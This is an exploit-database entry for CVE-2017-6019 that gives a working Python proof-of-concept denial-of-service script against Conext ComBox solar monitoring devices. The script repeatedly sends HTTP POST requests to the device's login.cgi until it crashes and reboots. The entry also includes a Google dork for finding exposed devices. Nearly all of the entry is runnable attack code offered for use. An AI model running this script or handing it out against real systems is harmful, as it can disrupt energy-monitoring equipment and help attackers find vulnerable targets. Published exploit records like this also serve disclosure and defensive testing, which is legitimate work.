Conext ComBox 865-1058 - Denial of Service Exploit

ID 1337DAY-ID-27203
Type zdt
Reporter Mark Liapustin
Modified 2017-03-06T00:00:00


Exploit for hardware platform in category dos / poc

                                            #Exploit Title: Conext ComBox - Denial of Service (HTTP-POST)
#Description: The exploit cause the device to self-reboot, constituting a denial of service.
#Google Dork: "Conext ComBox" + "JavaScript was not detected" /OR/ "Conext ComBox" + "Recover Lost Password"
#Date: March 02, 2017
#Exploit Author: Mark Liapustin & Arik Kublanov
#Vendor Homepage:
#Software Link:
#Version: All firmware versions prior to V3.03 BN 830
#Tested on: Windows and Linux
#CVE: CVE-2017-6019
# Use this script with caution!
# Mark Liapustin:
# Arik Kublanov:
# =========================================================
import subprocess
import os
import sys
import time
import socket
# =========================================================
print 'Usage: python IP PORT'
print 'Number of arguments:', len(sys.argv), 'arguments.'
print 'Argument List:', str(sys.argv)
print "ComBox Denial of Service via HTTP-POST Request"
global cmdosip
cmdosip = str(sys.argv[1])
port = int(sys.argv[2])
print "[!] The script will cause the Conext ComBox device to crash and to reboot itself."
print "Executing...\n\n\n"
for i in range(1, 1000):
    cmdosdir = "login.cgi?login_username=Nation-E&login_password=DOS&submit=Log+In"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((cmdosip, port))
    print "[+] Sent HTTP POST Request to: " + cmdosip + " with /" + cmdosdir + " HTTP/1.1"
    s.send("POST /" + cmdosdir + " HTTP/1.1\r\n")
    s.send("Host: " + cmdosip + "\r\n\r\n")

# [2018-04-11]  #